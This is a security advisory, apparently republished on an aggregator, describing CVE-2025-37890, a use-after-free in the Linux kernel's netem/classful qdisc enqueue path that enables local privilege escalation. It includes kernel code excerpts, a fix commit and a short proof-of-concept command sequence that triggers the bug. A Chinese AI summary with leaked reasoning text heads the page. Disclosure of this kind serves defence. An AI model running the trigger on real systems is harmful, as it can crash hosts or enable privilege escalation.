(CVE-2025-37890) Linux Kernel net_sched netem Double Enqueue Leading to Use-After-Free and Local Privilege Escalation

(CVE-2025-37890) Linux Kernel net_sched netem Double Enqueue Leading to Use-After-Free and Local Privilege Escalation
嗯，用户让我帮忙总结一下这篇文章的内容，控制在100字以内，而且不需要特定的开头。首先，我得仔细阅读文章，抓住关键点。文章主要讲的是Linux内核中的一个漏洞，CVE-2025-37890。这个漏洞属于高危级别，影响了从5.0.1到6.15-rc4的版本。漏洞类型是使用后释放（CWE-416），导致本地权限提升。技术细节方面，问题出在netem_enqueue函数中，当处理包复制时，可能会导致重复激活子类，从而引起use-after-free。攻击者可以利用这个漏洞实现本地提权。修复建议是升级到指定的提交版本，并且提到了发现者和时间线。现在要总结这些内容，控制在100字以内。需要包括漏洞名称、影响版本、严重性、技术细节、影响和修复建议。可能的结构是：Linux内核存在高危漏洞CVE-2025-37890，影响5.0.1至6.15-rc4版本。该漏洞源于netem模块中的use-after-free问题，可被本地无特权攻击者利用以实现权限提升。修复建议升级至特定提交版本。这样应该能涵盖主要信息，并且符合字数限制。 </think> Linux内核存在高危漏洞CVE-2025-37890，影响5.0.1至6.15-rc4版本。该漏洞源于netem模块中的use-after-free问题，可被本地无特权攻击者利用以实现权限提升。修复建议升级至指定提交版本。 2025-5-16 00:0:0 Author: starlabs.sg(查看原文) 阅读量:4 收藏

Advisory May 16, 2025 By Gerrard Tai 3 min read

CVE: CVE-2025-37890

Affected Versions: Linux kernel 5.0.1 through 6.15-rc4

CVSS3.1: 7.8 (High) — CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

Product	Linux Kernel (net_sched)
Vendor	Linux Kernel
Severity	High — a local unprivileged attacker may exploit this to achieve local privilege escalation
Affected Versions	Linux kernel 5.0.1 through 6.15-rc4
CVE Identifier	CVE-2025-37890
CVE Description	A use-after-free in the Linux kernel net scheduler HFSC module via netem’s re-entrant enqueue behaviour leads to local privilege escalation
CWE Classification(s)	CWE-416: Use After Free

CVSS4.0 Scoring System

Base Score: 8.5 Vector String: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Metric	Value
Attack Vector (AV)	Local
Attack Complexity (AC)	Low
Attack Requirements (AT)	None
Privileges Required (PR)	Low
User Interaction (UI)	None
Vulnerable System Confidentiality (VC)	High
Vulnerable System Integrity (VI)	High
Vulnerable System Availability (VA)	High
Subsequent System Confidentiality (SC)	None
Subsequent System Integrity (SI)	None
Subsequent System Availability (SA)	None

Technical Details

A use-after-free vulnerability in the Linux Kernel net scheduler subsystem can be exploited to achieve local privilege escalation. In the hfsc_enqueue routine, if the qdisc has a netem child, it is possible for the netem’s re-entrant behaviour to doubly activate a child class. This corrupts internal tracking, leading to a use-after-free vulnerability. We recommend upgrading past commit 37d9cf1a3ce35de3df6f7d209bfb1f50cf188cea.

The vulnerability lies in the netem_enqueue() function.

	if (skb2) {
		struct Qdisc *rootq = qdisc_root_bh(sch);
		u32 dupsave = q->duplicate; /* prevent duplicating a dup... */

		q->duplicate = 0;
		rootq->enqueue(skb2, rootq, to_free);                                // [1]
		q->duplicate = dupsave;
		skb2 = NULL;
	}

	qdisc_qstats_backlog_inc(sch, skb);

	cb = netem_skb_cb(skb);

	if (q->gap == 0 ||		/* not doing reordering */
	    q->counter < q->gap - 1 ||	/* inside last reordering gap */
	    q->reorder < get_crandom(&q->reorder_cor, &q->prng)) {
			
		// [...]

		tfifo_enqueue(skb, sch);                                             // [2]

When the netem qdisc tries to duplicate a packet, it enqueues the packet into the root qdisc ([1]). Subsequently, tfifo_enqueue() is called at [2], which increases the qdisc’s qlen.

A vulnerability exists when the netem qdisc is a child of a classful parent. For example, in drr_enqueue(), there is first a check ([3]) if the child qdisc is empty. Then, it enqueues the packet into the child qdisc ([4]). After the enqueue succeeds, it activates the newly active child ([5]).

	first = !cl->qdisc->q.qlen;                                              // [3]
	err = qdisc_enqueue(skb, cl->qdisc, to_free);                            // [4]
	if (unlikely(err != NET_XMIT_SUCCESS)) {
		if (net_xmit_drop_count(err)) {
			cl->qstats.drops++;
			qdisc_qstats_drop(sch);
		}
		return err;
	}

	if (first) {                                                             // [5]
		list_add_tail(&cl->alist, &q->active);
		cl->deficit = cl->quantum;
	}

When the parent (drr) receives a packet to enqueue in an empty netem qdisc, first = true at [3] and the packet is enqueued in netem. In netem, the packet duplication enqueues the packet in the root qdisc, the parent drr, again before it calls tfifo_enqueue() ([2]). So, the netem still has qlen = 0 when the drr_enqueue() logic runs for the second time. This causes first = true for the duplicate packet as well. Subsequently, both calls succeed and the new child activation occurs twice at [5].

This ’re-entrant’ behaviour is present in other classful qdiscs as well.

This bug can be used to manipulate classful qdisc’s internal tracking and escalated into a LPE.

Proof of Concept

unshare -rn
ip link set dev lo up
tc qdisc add dev lo handle 1:0 root drr
tc class add dev lo classid 1:1 drr
tc qdisc add dev lo parent 1:1 handle 2:0 netem duplicate 100%
echo "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))

Fix

Upgrade past commit 37d9cf1a. The fix introduces a check of the n_active class variable to prevent duplicate insertions.

Credit

Gerrard Tai of STAR Labs SG Pte. Ltd.

Timeline

2025-03-28 — Reported to Linux Kernel Security Team
2025-05-16 — CVE-2025-37890 published

文章来源: https://starlabs.sg/advisories/25/25-37890/
如有侵权请联系:admin#unsafe.sh